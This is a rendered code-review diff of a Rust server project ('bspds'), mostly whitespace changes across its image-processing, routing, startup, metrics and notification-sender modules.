fn decode_image(&self, data: &[u8], format: ImageFormat) -> Result<DynamicImage, ImageError> {
128
let cursor = Cursor::new(data);
129
let reader = ImageReader::with_format(cursor, format);
···
131
.decode()
132
.map_err(|e| ImageError::DecodeError(e.to_string()))
133
}
134
fn encode_image(&self, img: &DynamicImage) -> Result<ProcessedImage, ImageError> {
135
let (data, mime_type) = match self.output_format {
136
OutputFormat::WebP => {
···
165
height: img.height(),
166
})
167
}
168
fn generate_thumbnail(&self, img: &DynamicImage, max_size: u32) -> Result<ProcessedImage, ImageError> {
169
let (orig_width, orig_height) = (img.width(), img.height());
170
let (new_width, new_height) = if orig_width > orig_height {
···
177
let thumb = img.resize(new_width, new_height, FilterType::Lanczos3);
178
self.encode_image(&thumb)
179
}
180
pub fn is_supported_mime_type(mime_type: &str) -> bool {
181
matches!(
182
mime_type.to_lowercase().as_str(),
183
"image/jpeg" | "image/jpg" | "image/png" | "image/gif" | "image/webp"
184
)
185
}
186
pub fn strip_exif(data: &[u8]) -> Result<Vec<u8>, ImageError> {
187
let format = image::guess_format(data)
188
.map_err(|e| ImageError::DecodeError(e.to_string()))?;
···
196
Ok(buf)
197
}
198
}
199
#[cfg(test)]
200
mod tests {
201
use super::*;
202
fn create_test_image(width: u32, height: u32) -> Vec<u8> {
203
let img = DynamicImage::new_rgb8(width, height);
204
let mut buf = Vec::new();
205
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png).unwrap();
206
buf
207
}
208
#[test]
209
fn test_process_small_image() {
210
let processor = ImageProcessor::new();
···
213
assert!(result.thumbnail_feed.is_none());
214
assert!(result.thumbnail_full.is_none());
215
}
216
#[test]
217
fn test_process_large_image_generates_thumbnails() {
218
let processor = ImageProcessor::new();
···
227
assert!(full_thumb.width <= THUMB_SIZE_FULL);
228
assert!(full_thumb.height <= THUMB_SIZE_FULL);
229
}
230
#[test]
231
fn test_webp_conversion() {
232
let processor = ImageProcessor::new().with_output_format(OutputFormat::WebP);
···
234
let result = processor.process(&data, "image/png").unwrap();
235
assert_eq!(result.original.mime_type, "image/webp");
236
}
237
#[test]
238
fn test_reject_too_large() {
239
let processor = ImageProcessor::new().with_max_dimension(1000);
···
241
let result = processor.process(&data, "image/png");
242
assert!(matches!(result, Err(ImageError::TooLarge { .. })));
243
}
244
#[test]
245
fn test_is_supported_mime_type() {
246
assert!(ImageProcessor::is_supported_mime_type("image/jpeg"));
···
1
use image::{DynamicImage, ImageFormat, ImageReader, imageops::FilterType};
2
use std::io::Cursor;
3
+
4
pub const THUMB_SIZE_FEED: u32 = 200;
5
pub const THUMB_SIZE_FULL: u32 = 1000;
6
+
7
#[derive(Debug, Clone)]
8
pub struct ProcessedImage {
9
pub data: Vec<u8>,
···
11
pub width: u32,
12
pub height: u32,
13
}
14
+
15
#[derive(Debug, Clone)]
16
pub struct ImageProcessingResult {
17
pub original: ProcessedImage,
18
pub thumbnail_feed: Option<ProcessedImage>,
19
pub thumbnail_full: Option<ProcessedImage>,
20
}
21
+
22
#[derive(Debug, thiserror::Error)]
23
pub enum ImageError {
24
#[error("Failed to decode image: {0}")]
···
36
#[error("File too large: {size} bytes exceeds maximum {max_size} bytes")]
37
FileTooLarge { size: usize, max_size: usize },
38
}
39
+
40
+
pub const DEFAULT_MAX_FILE_SIZE: usize = 10 * 1024 * 1024;
41
+
42
pub struct ImageProcessor {
43
max_dimension: u32,
44
max_file_size: usize,
45
output_format: OutputFormat,
46
generate_thumbnails: bool,
47
}
48
+
49
#[derive(Debug, Clone, Copy)]
50
pub enum OutputFormat {
51
WebP,
···
53
Png,
54
Original,
55
}
56
+
57
impl Default for ImageProcessor {
58
fn default() -> Self {
59
Self {
···
64
}
65
}
66
}
67
+
68
impl ImageProcessor {
69
pub fn new() -> Self {
70
Self::default()
71
}
72
+
73
pub fn with_max_dimension(mut self, max: u32) -> Self {
74
self.max_dimension = max;
75
self
76
}
77
+
78
pub fn with_max_file_size(mut self, max: usize) -> Self {
79
self.max_file_size = max;
80
self
81
}
82
+
83
pub fn with_output_format(mut self, format: OutputFormat) -> Self {
84
self.output_format = format;
85
self
86
}
87
+
88
pub fn with_thumbnails(mut self, generate: bool) -> Self {
89
self.generate_thumbnails = generate;
90
self
91
}
92
+
93
pub fn process(&self, data: &[u8], mime_type: &str) -> Result<ImageProcessingResult, ImageError> {
94
if data.len() > self.max_file_size {
95
return Err(ImageError::FileTooLarge {
···
123
thumbnail_full,
124
})
125
}
126
+
127
fn detect_format(&self, mime_type: &str, data: &[u8]) -> Result<ImageFormat, ImageError> {
128
match mime_type.to_lowercase().as_str() {
129
"image/jpeg" | "image/jpg" => Ok(ImageFormat::Jpeg),
···
139
}
140
}
141
}
142
+
143
fn decode_image(&self, data: &[u8], format: ImageFormat) -> Result<DynamicImage, ImageError> {
144
let cursor = Cursor::new(data);
145
let reader = ImageReader::with_format(cursor, format);
···
147
.decode()
148
.map_err(|e| ImageError::DecodeError(e.to_string()))
149
}
150
+
151
fn encode_image(&self, img: &DynamicImage) -> Result<ProcessedImage, ImageError> {
152
let (data, mime_type) = match self.output_format {
153
OutputFormat::WebP => {
···
182
height: img.height(),
183
})
184
}
185
+
186
fn generate_thumbnail(&self, img: &DynamicImage, max_size: u32) -> Result<ProcessedImage, ImageError> {
187
let (orig_width, orig_height) = (img.width(), img.height());
188
let (new_width, new_height) = if orig_width > orig_height {
···
195
let thumb = img.resize(new_width, new_height, FilterType::Lanczos3);
196
self.encode_image(&thumb)
197
}
198
+
199
pub fn is_supported_mime_type(mime_type: &str) -> bool {
200
matches!(
201
mime_type.to_lowercase().as_str(),
202
"image/jpeg" | "image/jpg" | "image/png" | "image/gif" | "image/webp"
203
)
204
}
205
+
206
pub fn strip_exif(data: &[u8]) -> Result<Vec<u8>, ImageError> {
207
let format = image::guess_format(data)
208
.map_err(|e| ImageError::DecodeError(e.to_string()))?;
···
216
Ok(buf)
217
}
218
}
219
+
220
#[cfg(test)]
221
mod tests {
222
use super::*;
223
+
224
fn create_test_image(width: u32, height: u32) -> Vec<u8> {
225
let img = DynamicImage::new_rgb8(width, height);
226
let mut buf = Vec::new();
227
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png).unwrap();
228
buf
229
}
230
+
231
#[test]
232
fn test_process_small_image() {
233
let processor = ImageProcessor::new();
···
236
assert!(result.thumbnail_feed.is_none());
237
assert!(result.thumbnail_full.is_none());
238
}
239
+
240
#[test]
241
fn test_process_large_image_generates_thumbnails() {
242
let processor = ImageProcessor::new();
···
251
assert!(full_thumb.width <= THUMB_SIZE_FULL);
252
assert!(full_thumb.height <= THUMB_SIZE_FULL);
253
}
254
+
255
#[test]
256
fn test_webp_conversion() {
257
let processor = ImageProcessor::new().with_output_format(OutputFormat::WebP);
···
259
let result = processor.process(&data, "image/png").unwrap();
260
assert_eq!(result.original.mime_type, "image/webp");
261
}
262
+
263
#[test]
264
fn test_reject_too_large() {
265
let processor = ImageProcessor::new().with_max_dimension(1000);
···
267
let result = processor.process(&data, "image/png");
268
assert!(matches!(result, Err(ImageError::TooLarge { .. })));
269
}
270
+
271
#[test]
272
fn test_is_supported_mime_type() {
273
assert!(ImageProcessor::is_supported_mime_type("image/jpeg"));
+4
-1
src/lib.rs
+4
-1
src/lib.rs
···
16
pub mod sync;
17
pub mod util;
18
pub mod validation;
19
use axum::{
20
Router,
21
http::Method,
···
25
use state::AppState;
26
use tower_http::cors::{Any, CorsLayer};
27
use tower_http::services::{ServeDir, ServeFile};
28
pub fn app(state: AppState) -> Router {
29
let router = Router::new()
30
.route("/metrics", get(metrics::metrics_handler))
···
358
.route("/.well-known/did.json", get(api::identity::well_known_did))
359
.route("/.well-known/atproto-did", get(api::identity::well_known_atproto_did))
360
.route("/u/{handle}/did.json", get(api::identity::user_did_doc))
361
-
// OAuth 2.1 endpoints
362
.route(
363
"/.well-known/oauth-protected-resource",
364
get(oauth::endpoints::oauth_protected_resource),
···
402
.allow_headers(Any),
403
)
404
.with_state(state);
405
let frontend_dir = std::env::var("FRONTEND_DIR")
406
.unwrap_or_else(|_| "./frontend/dist".to_string());
407
if std::path::Path::new(&frontend_dir).join("index.html").exists() {
408
let index_path = format!("{}/index.html", frontend_dir);
409
let serve_dir = ServeDir::new(&frontend_dir)
···
16
pub mod sync;
17
pub mod util;
18
pub mod validation;
19
+
20
use axum::{
21
Router,
22
http::Method,
···
26
use state::AppState;
27
use tower_http::cors::{Any, CorsLayer};
28
use tower_http::services::{ServeDir, ServeFile};
29
+
30
pub fn app(state: AppState) -> Router {
31
let router = Router::new()
32
.route("/metrics", get(metrics::metrics_handler))
···
360
.route("/.well-known/did.json", get(api::identity::well_known_did))
361
.route("/.well-known/atproto-did", get(api::identity::well_known_atproto_did))
362
.route("/u/{handle}/did.json", get(api::identity::user_did_doc))
363
.route(
364
"/.well-known/oauth-protected-resource",
365
get(oauth::endpoints::oauth_protected_resource),
···
403
.allow_headers(Any),
404
)
405
.with_state(state);
406
+
407
let frontend_dir = std::env::var("FRONTEND_DIR")
408
.unwrap_or_else(|_| "./frontend/dist".to_string());
409
+
410
if std::path::Path::new(&frontend_dir).join("index.html").exists() {
411
let index_path = format!("{}/index.html", frontend_dir);
412
let serve_dir = ServeDir::new(&frontend_dir)
+30
src/main.rs
+30
src/main.rs
···
6
use std::sync::Arc;
7
use tokio::sync::watch;
8
use tracing::{error, info, warn};
9
#[tokio::main]
10
async fn main() -> ExitCode {
11
dotenvy::dotenv().ok();
12
tracing_subscriber::fmt::init();
13
bspds::metrics::init_metrics();
14
match run().await {
15
Ok(()) => ExitCode::SUCCESS,
16
Err(e) => {
···
19
}
20
}
21
}
22
async fn run() -> Result<(), Box<dyn std::error::Error>> {
23
let database_url = std::env::var("DATABASE_URL")
24
.map_err(|_| "DATABASE_URL environment variable must be set")?;
25
let max_connections: u32 = std::env::var("DATABASE_MAX_CONNECTIONS")
26
.ok()
27
.and_then(|v| v.parse().ok())
28
.unwrap_or(100);
29
let min_connections: u32 = std::env::var("DATABASE_MIN_CONNECTIONS")
30
.ok()
31
.and_then(|v| v.parse().ok())
32
.unwrap_or(10);
33
let acquire_timeout_secs: u64 = std::env::var("DATABASE_ACQUIRE_TIMEOUT_SECS")
34
.ok()
35
.and_then(|v| v.parse().ok())
36
.unwrap_or(10);
37
info!(
38
"Configuring database pool: max={}, min={}, acquire_timeout={}s",
39
max_connections, min_connections, acquire_timeout_secs
40
);
41
let pool = sqlx::postgres::PgPoolOptions::new()
42
.max_connections(max_connections)
43
.min_connections(min_connections)
···
47
.connect(&database_url)
48
.await
49
.map_err(|e| format!("Failed to connect to Postgres: {}", e))?;
50
sqlx::migrate!("./migrations")
51
.run(&pool)
52
.await
53
.map_err(|e| format!("Failed to run migrations: {}", e))?;
54
let state = AppState::new(pool.clone()).await;
55
bspds::sync::listener::start_sequencer_listener(state.clone()).await;
56
let (shutdown_tx, shutdown_rx) = watch::channel(false);
57
let mut notification_service = NotificationService::new(pool);
58
if let Some(email_sender) = EmailSender::from_env() {
59
info!("Email notifications enabled");
60
notification_service = notification_service.register_sender(email_sender);
61
} else {
62
warn!("Email notifications disabled (MAIL_FROM_ADDRESS not set)");
63
}
64
if let Some(discord_sender) = DiscordSender::from_env() {
65
info!("Discord notifications enabled");
66
notification_service = notification_service.register_sender(discord_sender);
67
}
68
if let Some(telegram_sender) = TelegramSender::from_env() {
69
info!("Telegram notifications enabled");
70
notification_service = notification_service.register_sender(telegram_sender);
71
}
72
if let Some(signal_sender) = SignalSender::from_env() {
73
info!("Signal notifications enabled");
74
notification_service = notification_service.register_sender(signal_sender);
75
}
76
let notification_handle = tokio::spawn(notification_service.run(shutdown_rx.clone()));
77
let crawlers_handle = if let Some(crawlers) = Crawlers::from_env() {
78
let crawlers = Arc::new(
79
crawlers.with_circuit_breaker(state.circuit_breakers.relay_notification.clone())
···
85
warn!("Crawlers notification service disabled (PDS_HOSTNAME or CRAWLERS not set)");
86
None
87
};
88
let app = bspds::app(state);
89
let addr = SocketAddr::from(([127, 0, 0, 1], 3000));
90
info!("listening on {}", addr);
91
let listener = tokio::net::TcpListener::bind(addr)
92
.await
93
.map_err(|e| format!("Failed to bind to {}: {}", addr, e))?;
94
let server_result = axum::serve(listener, app)
95
.with_graceful_shutdown(shutdown_signal(shutdown_tx))
96
.await;
97
notification_handle.await.ok();
98
if let Some(handle) = crawlers_handle {
99
handle.await.ok();
100
}
101
if let Err(e) = server_result {
102
return Err(format!("Server error: {}", e).into());
103
}
104
Ok(())
105
}
106
async fn shutdown_signal(shutdown_tx: watch::Sender<bool>) {
107
let ctrl_c = async {
108
match tokio::signal::ctrl_c().await {
···
112
}
113
}
114
};
115
#[cfg(unix)]
116
let terminate = async {
117
match tokio::signal::unix::signal(tokio::signal::unix::SignalKind::terminate()) {
···
124
}
125
}
126
};
127
#[cfg(not(unix))]
128
let terminate = std::future::pending::<()>();
129
tokio::select! {
130
_ = ctrl_c => {},
131
_ = terminate => {},
132
}
133
info!("Shutdown signal received, stopping services...");
134
shutdown_tx.send(true).ok();
135
}
···
6
use std::sync::Arc;
7
use tokio::sync::watch;
8
use tracing::{error, info, warn};
9
+
10
#[tokio::main]
11
async fn main() -> ExitCode {
12
dotenvy::dotenv().ok();
13
tracing_subscriber::fmt::init();
14
bspds::metrics::init_metrics();
15
+
16
match run().await {
17
Ok(()) => ExitCode::SUCCESS,
18
Err(e) => {
···
21
}
22
}
23
}
24
+
25
async fn run() -> Result<(), Box<dyn std::error::Error>> {
26
let database_url = std::env::var("DATABASE_URL")
27
.map_err(|_| "DATABASE_URL environment variable must be set")?;
28
+
29
let max_connections: u32 = std::env::var("DATABASE_MAX_CONNECTIONS")
30
.ok()
31
.and_then(|v| v.parse().ok())
32
.unwrap_or(100);
33
+
34
let min_connections: u32 = std::env::var("DATABASE_MIN_CONNECTIONS")
35
.ok()
36
.and_then(|v| v.parse().ok())
37
.unwrap_or(10);
38
+
39
let acquire_timeout_secs: u64 = std::env::var("DATABASE_ACQUIRE_TIMEOUT_SECS")
40
.ok()
41
.and_then(|v| v.parse().ok())
42
.unwrap_or(10);
43
+
44
info!(
45
"Configuring database pool: max={}, min={}, acquire_timeout={}s",
46
max_connections, min_connections, acquire_timeout_secs
47
);
48
+
49
let pool = sqlx::postgres::PgPoolOptions::new()
50
.max_connections(max_connections)
51
.min_connections(min_connections)
···
55
.connect(&database_url)
56
.await
57
.map_err(|e| format!("Failed to connect to Postgres: {}", e))?;
58
+
59
sqlx::migrate!("./migrations")
60
.run(&pool)
61
.await
62
.map_err(|e| format!("Failed to run migrations: {}", e))?;
63
+
64
let state = AppState::new(pool.clone()).await;
65
bspds::sync::listener::start_sequencer_listener(state.clone()).await;
66
+
67
let (shutdown_tx, shutdown_rx) = watch::channel(false);
68
+
69
let mut notification_service = NotificationService::new(pool);
70
+
71
if let Some(email_sender) = EmailSender::from_env() {
72
info!("Email notifications enabled");
73
notification_service = notification_service.register_sender(email_sender);
74
} else {
75
warn!("Email notifications disabled (MAIL_FROM_ADDRESS not set)");
76
}
77
+
78
if let Some(discord_sender) = DiscordSender::from_env() {
79
info!("Discord notifications enabled");
80
notification_service = notification_service.register_sender(discord_sender);
81
}
82
+
83
if let Some(telegram_sender) = TelegramSender::from_env() {
84
info!("Telegram notifications enabled");
85
notification_service = notification_service.register_sender(telegram_sender);
86
}
87
+
88
if let Some(signal_sender) = SignalSender::from_env() {
89
info!("Signal notifications enabled");
90
notification_service = notification_service.register_sender(signal_sender);
91
}
92
+
93
let notification_handle = tokio::spawn(notification_service.run(shutdown_rx.clone()));
94
+
95
let crawlers_handle = if let Some(crawlers) = Crawlers::from_env() {
96
let crawlers = Arc::new(
97
crawlers.with_circuit_breaker(state.circuit_breakers.relay_notification.clone())
···
103
warn!("Crawlers notification service disabled (PDS_HOSTNAME or CRAWLERS not set)");
104
None
105
};
106
+
107
let app = bspds::app(state);
108
let addr = SocketAddr::from(([127, 0, 0, 1], 3000));
109
info!("listening on {}", addr);
110
+
111
let listener = tokio::net::TcpListener::bind(addr)
112
.await
113
.map_err(|e| format!("Failed to bind to {}: {}", addr, e))?;
114
+
115
let server_result = axum::serve(listener, app)
116
.with_graceful_shutdown(shutdown_signal(shutdown_tx))
117
.await;
118
+
119
notification_handle.await.ok();
120
+
121
if let Some(handle) = crawlers_handle {
122
handle.await.ok();
123
}
124
+
125
if let Err(e) = server_result {
126
return Err(format!("Server error: {}", e).into());
127
}
128
+
129
Ok(())
130
}
131
+
132
async fn shutdown_signal(shutdown_tx: watch::Sender<bool>) {
133
let ctrl_c = async {
134
match tokio::signal::ctrl_c().await {
···
138
}
139
}
140
};
141
+
142
#[cfg(unix)]
143
let terminate = async {
144
match tokio::signal::unix::signal(tokio::signal::unix::SignalKind::terminate()) {
···
151
}
152
}
153
};
154
+
155
#[cfg(not(unix))]
156
let terminate = std::future::pending::<()>();
157
+
158
tokio::select! {
159
_ = ctrl_c => {},
160
_ = terminate => {},
161
}
162
+
163
info!("Shutdown signal received, stopping services...");
164
shutdown_tx.send(true).ok();
165
}
+28
src/metrics.rs
+28
src/metrics.rs
···
8
use metrics_exporter_prometheus::{PrometheusBuilder, PrometheusHandle};
9
use std::sync::OnceLock;
10
use std::time::Instant;
11
static PROMETHEUS_HANDLE: OnceLock<PrometheusHandle> = OnceLock::new();
12
pub fn init_metrics() -> PrometheusHandle {
13
let builder = PrometheusBuilder::new();
14
let handle = builder
15
.install_recorder()
16
.expect("failed to install Prometheus recorder");
17
PROMETHEUS_HANDLE.set(handle.clone()).ok();
18
describe_metrics();
19
handle
20
}
21
fn describe_metrics() {
22
metrics::describe_counter!(
23
"bspds_http_requests_total",
···
68
"Database query duration in seconds"
69
);
70
}
71
pub async fn metrics_handler() -> impl IntoResponse {
72
match PROMETHEUS_HANDLE.get() {
73
Some(handle) => {
···
81
),
82
}
83
}
84
pub async fn metrics_middleware(request: Request<Body>, next: Next) -> Response {
85
let start = Instant::now();
86
let method = request.method().to_string();
87
let path = normalize_path(request.uri().path());
88
let response = next.run(request).await;
89
let duration = start.elapsed().as_secs_f64();
90
let status = response.status().as_u16().to_string();
91
counter!(
92
"bspds_http_requests_total",
93
"method" => method.clone(),
···
95
"status" => status.clone()
96
)
97
.increment(1);
98
histogram!(
99
"bspds_http_request_duration_seconds",
100
"method" => method,
101
"path" => path
102
)
103
.record(duration);
104
response
105
}
106
fn normalize_path(path: &str) -> String {
107
if path.starts_with("/xrpc/") {
108
if let Some(method) = path.strip_prefix("/xrpc/") {
···
112
return path.to_string();
113
}
114
}
115
if path.starts_with("/u/") && path.ends_with("/did.json") {
116
return "/u/{handle}/did.json".to_string();
117
}
118
if path.starts_with("/oauth/") {
119
return path.to_string();
120
}
121
path.to_string()
122
}
123
pub fn record_auth_cache_hit(cache_type: &str) {
124
counter!("bspds_auth_cache_hits_total", "cache_type" => cache_type.to_string()).increment(1);
125
}
126
pub fn record_auth_cache_miss(cache_type: &str) {
127
counter!("bspds_auth_cache_misses_total", "cache_type" => cache_type.to_string()).increment(1);
128
}
129
pub fn set_firehose_subscribers(count: usize) {
130
gauge!("bspds_firehose_subscribers").set(count as f64);
131
}
132
pub fn increment_firehose_subscribers() {
133
counter!("bspds_firehose_events_total").increment(1);
134
}
135
pub fn record_firehose_event() {
136
counter!("bspds_firehose_events_total").increment(1);
137
}
138
pub fn record_block_operation(op_type: &str) {
139
counter!("bspds_block_operations_total", "op_type" => op_type.to_string()).increment(1);
140
}
141
pub fn record_s3_operation(op_type: &str, status: &str) {
142
counter!(
143
"bspds_s3_operations_total",
···
146
)
147
.increment(1);
148
}
149
pub fn set_notification_queue_size(size: usize) {
150
gauge!("bspds_notification_queue_size").set(size as f64);
151
}
152
pub fn record_rate_limit_rejection(limiter: &str) {
153
counter!("bspds_rate_limit_rejections_total", "limiter" => limiter.to_string()).increment(1);
154
}
155
pub fn record_db_query(query_type: &str, duration_seconds: f64) {
156
counter!("bspds_db_queries_total", "query_type" => query_type.to_string()).increment(1);
157
histogram!(
···
160
)
161
.record(duration_seconds);
162
}
163
#[cfg(test)]
164
mod tests {
165
use super::*;
166
#[test]
167
fn test_normalize_path() {
168
assert_eq!(
···
8
use metrics_exporter_prometheus::{PrometheusBuilder, PrometheusHandle};
9
use std::sync::OnceLock;
10
use std::time::Instant;
11
+
12
static PROMETHEUS_HANDLE: OnceLock<PrometheusHandle> = OnceLock::new();
13
+
14
pub fn init_metrics() -> PrometheusHandle {
15
let builder = PrometheusBuilder::new();
16
let handle = builder
17
.install_recorder()
18
.expect("failed to install Prometheus recorder");
19
+
20
PROMETHEUS_HANDLE.set(handle.clone()).ok();
21
describe_metrics();
22
+
23
handle
24
}
25
+
26
fn describe_metrics() {
27
metrics::describe_counter!(
28
"bspds_http_requests_total",
···
73
"Database query duration in seconds"
74
);
75
}
76
+
77
pub async fn metrics_handler() -> impl IntoResponse {
78
match PROMETHEUS_HANDLE.get() {
79
Some(handle) => {
···
87
),
88
}
89
}
90
+
91
pub async fn metrics_middleware(request: Request<Body>, next: Next) -> Response {
92
let start = Instant::now();
93
let method = request.method().to_string();
94
let path = normalize_path(request.uri().path());
95
+
96
let response = next.run(request).await;
97
+
98
let duration = start.elapsed().as_secs_f64();
99
let status = response.status().as_u16().to_string();
100
+
101
counter!(
102
"bspds_http_requests_total",
103
"method" => method.clone(),
···
105
"status" => status.clone()
106
)
107
.increment(1);
108
+
109
histogram!(
110
"bspds_http_request_duration_seconds",
111
"method" => method,
112
"path" => path
113
)
114
.record(duration);
115
+
116
response
117
}
118
+
119
fn normalize_path(path: &str) -> String {
120
if path.starts_with("/xrpc/") {
121
if let Some(method) = path.strip_prefix("/xrpc/") {
···
125
return path.to_string();
126
}
127
}
128
+
129
if path.starts_with("/u/") && path.ends_with("/did.json") {
130
return "/u/{handle}/did.json".to_string();
131
}
132
+
133
if path.starts_with("/oauth/") {
134
return path.to_string();
135
}
136
+
137
path.to_string()
138
}
139
+
140
pub fn record_auth_cache_hit(cache_type: &str) {
141
counter!("bspds_auth_cache_hits_total", "cache_type" => cache_type.to_string()).increment(1);
142
}
143
+
144
pub fn record_auth_cache_miss(cache_type: &str) {
145
counter!("bspds_auth_cache_misses_total", "cache_type" => cache_type.to_string()).increment(1);
146
}
147
+
148
pub fn set_firehose_subscribers(count: usize) {
149
gauge!("bspds_firehose_subscribers").set(count as f64);
150
}
151
+
152
pub fn increment_firehose_subscribers() {
153
counter!("bspds_firehose_events_total").increment(1);
154
}
155
+
156
pub fn record_firehose_event() {
157
counter!("bspds_firehose_events_total").increment(1);
158
}
159
+
160
pub fn record_block_operation(op_type: &str) {
161
counter!("bspds_block_operations_total", "op_type" => op_type.to_string()).increment(1);
162
}
163
+
164
pub fn record_s3_operation(op_type: &str, status: &str) {
165
counter!(
166
"bspds_s3_operations_total",
···
169
)
170
.increment(1);
171
}
172
+
173
pub fn set_notification_queue_size(size: usize) {
174
gauge!("bspds_notification_queue_size").set(size as f64);
175
}
176
+
177
pub fn record_rate_limit_rejection(limiter: &str) {
178
counter!("bspds_rate_limit_rejections_total", "limiter" => limiter.to_string()).increment(1);
179
}
180
+
181
pub fn record_db_query(query_type: &str, duration_seconds: f64) {
182
counter!("bspds_db_queries_total", "query_type" => query_type.to_string()).increment(1);
183
histogram!(
···
186
)
187
.record(duration_seconds);
188
}
189
+
190
#[cfg(test)]
191
mod tests {
192
use super::*;
193
+
194
#[test]
195
fn test_normalize_path() {
196
assert_eq!(
+3
src/notifications/mod.rs
+3
src/notifications/mod.rs
···
1
mod sender;
2
mod service;
3
mod types;
4
pub use sender::{
5
DiscordSender, EmailSender, NotificationSender, SendError, SignalSender, TelegramSender,
6
is_valid_phone_number, sanitize_header_value,
7
};
8
pub use service::{
9
channel_display_name, enqueue_2fa_code, enqueue_account_deletion, enqueue_email_update,
10
enqueue_email_verification, enqueue_notification, enqueue_password_reset,
11
enqueue_plc_operation, enqueue_signup_verification, enqueue_welcome, NotificationService,
12
};
13
pub use types::{
14
NewNotification, NotificationChannel, NotificationStatus, NotificationType, QueuedNotification,
15
};
···
1
mod sender;
2
mod service;
3
mod types;
4
+
5
pub use sender::{
6
DiscordSender, EmailSender, NotificationSender, SendError, SignalSender, TelegramSender,
7
is_valid_phone_number, sanitize_header_value,
8
};
9
+
10
pub use service::{
11
channel_display_name, enqueue_2fa_code, enqueue_account_deletion, enqueue_email_update,
12
enqueue_email_verification, enqueue_notification, enqueue_password_reset,
13
enqueue_plc_operation, enqueue_signup_verification, enqueue_welcome, NotificationService,
14
};
15
+
16
pub use types::{
17
NewNotification, NotificationChannel, NotificationStatus, NotificationType, QueuedNotification,
18
};
+30
src/notifications/sender.rs
+30
src/notifications/sender.rs
···
5
use std::time::Duration;
6
use tokio::io::AsyncWriteExt;
7
use tokio::process::Command;
8
use super::types::{NotificationChannel, QueuedNotification};
9
const HTTP_TIMEOUT_SECS: u64 = 30;
10
const MAX_RETRIES: u32 = 3;
11
const INITIAL_RETRY_DELAY_MS: u64 = 500;
12
#[async_trait]
13
pub trait NotificationSender: Send + Sync {
14
fn channel(&self) -> NotificationChannel;
15
async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError>;
16
}
17
#[derive(Debug, thiserror::Error)]
18
pub enum SendError {
19
#[error("Failed to spawn sendmail process: {0}")]
···
31
#[error("Max retries exceeded: {0}")]
32
MaxRetriesExceeded(String),
33
}
34
fn create_http_client() -> Client {
35
Client::builder()
36
.timeout(Duration::from_secs(HTTP_TIMEOUT_SECS))
···
38
.build()
39
.unwrap_or_else(|_| Client::new())
40
}
41
fn is_retryable_status(status: reqwest::StatusCode) -> bool {
42
status.is_server_error() || status == reqwest::StatusCode::TOO_MANY_REQUESTS
43
}
44
async fn retry_delay(attempt: u32) {
45
let delay_ms = INITIAL_RETRY_DELAY_MS * 2u64.pow(attempt);
46
tokio::time::sleep(Duration::from_millis(delay_ms)).await;
47
}
48
pub fn sanitize_header_value(value: &str) -> String {
49
value.replace(['\r', '\n'], " ").trim().to_string()
50
}
51
pub fn is_valid_phone_number(number: &str) -> bool {
52
if number.len() < 2 || number.len() > 20 {
53
return false;
···
59
let remaining: String = chars.collect();
60
!remaining.is_empty() && remaining.chars().all(|c| c.is_ascii_digit())
61
}
62
pub struct EmailSender {
63
from_address: String,
64
from_name: String,
65
sendmail_path: String,
66
}
67
impl EmailSender {
68
pub fn new(from_address: String, from_name: String) -> Self {
69
Self {
···
72
sendmail_path: std::env::var("SENDMAIL_PATH").unwrap_or_else(|_| "/usr/sbin/sendmail".to_string()),
73
}
74
}
75
pub fn from_env() -> Option<Self> {
76
let from_address = std::env::var("MAIL_FROM_ADDRESS").ok()?;
77
let from_name = std::env::var("MAIL_FROM_NAME").unwrap_or_else(|_| "BSPDS".to_string());
78
Some(Self::new(from_address, from_name))
79
}
80
pub fn format_email(&self, notification: &QueuedNotification) -> String {
81
let subject = sanitize_header_value(notification.subject.as_deref().unwrap_or("Notification"));
82
let recipient = sanitize_header_value(¬ification.recipient);
···
94
)
95
}
96
}
97
#[async_trait]
98
impl NotificationSender for EmailSender {
99
fn channel(&self) -> NotificationChannel {
100
NotificationChannel::Email
101
}
102
async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError> {
103
let email_content = self.format_email(notification);
104
let mut child = Command::new(&self.sendmail_path)
···
119
Ok(())
120
}
121
}
122
pub struct DiscordSender {
123
webhook_url: String,
124
http_client: Client,
125
}
126
impl DiscordSender {
127
pub fn new(webhook_url: String) -> Self {
128
Self {
···
130
http_client: create_http_client(),
131
}
132
}
133
pub fn from_env() -> Option<Self> {
134
let webhook_url = std::env::var("DISCORD_WEBHOOK_URL").ok()?;
135
Some(Self::new(webhook_url))
136
}
137
}
138
#[async_trait]
139
impl NotificationSender for DiscordSender {
140
fn channel(&self) -> NotificationChannel {
141
NotificationChannel::Discord
142
}
143
async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError> {
144
let subject = notification.subject.as_deref().unwrap_or("Notification");
145
let content = format!("**{}**\n\n{}", subject, notification.body);
···
193
))
194
}
195
}
196
pub struct TelegramSender {
197
bot_token: String,
198
http_client: Client,
199
}
200
impl TelegramSender {
201
pub fn new(bot_token: String) -> Self {
202
Self {
···
204
http_client: create_http_client(),
205
}
206
}
207
pub fn from_env() -> Option<Self> {
208
let bot_token = std::env::var("TELEGRAM_BOT_TOKEN").ok()?;
209
Some(Self::new(bot_token))
210
}
211
}
212
#[async_trait]
213
impl NotificationSender for TelegramSender {
214
fn channel(&self) -> NotificationChannel {
215
NotificationChannel::Telegram
216
}
217
async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError> {
218
let chat_id = ¬ification.recipient;
219
let subject = notification.subject.as_deref().unwrap_or("Notification");
···
273
))
274
}
275
}
276
pub struct SignalSender {
277
signal_cli_path: String,
278
sender_number: String,
279
}
280
impl SignalSender {
281
pub fn new(signal_cli_path: String, sender_number: String) -> Self {
282
Self {
···
284
sender_number,
285
}
286
}
287
pub fn from_env() -> Option<Self> {
288
let signal_cli_path = std::env::var("SIGNAL_CLI_PATH")
289
.unwrap_or_else(|_| "/usr/local/bin/signal-cli".to_string());
···
291
Some(Self::new(signal_cli_path, sender_number))
292
}
293
}
294
#[async_trait]
295
impl NotificationSender for SignalSender {
296
fn channel(&self) -> NotificationChannel {
297
NotificationChannel::Signal
298
}
299
async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError> {
300
let recipient = ¬ification.recipient;
301
if !is_valid_phone_number(recipient) {
···
5
use std::time::Duration;
6
use tokio::io::AsyncWriteExt;
7
use tokio::process::Command;
8
+
9
use super::types::{NotificationChannel, QueuedNotification};
10
+
11
const HTTP_TIMEOUT_SECS: u64 = 30;
12
const MAX_RETRIES: u32 = 3;
13
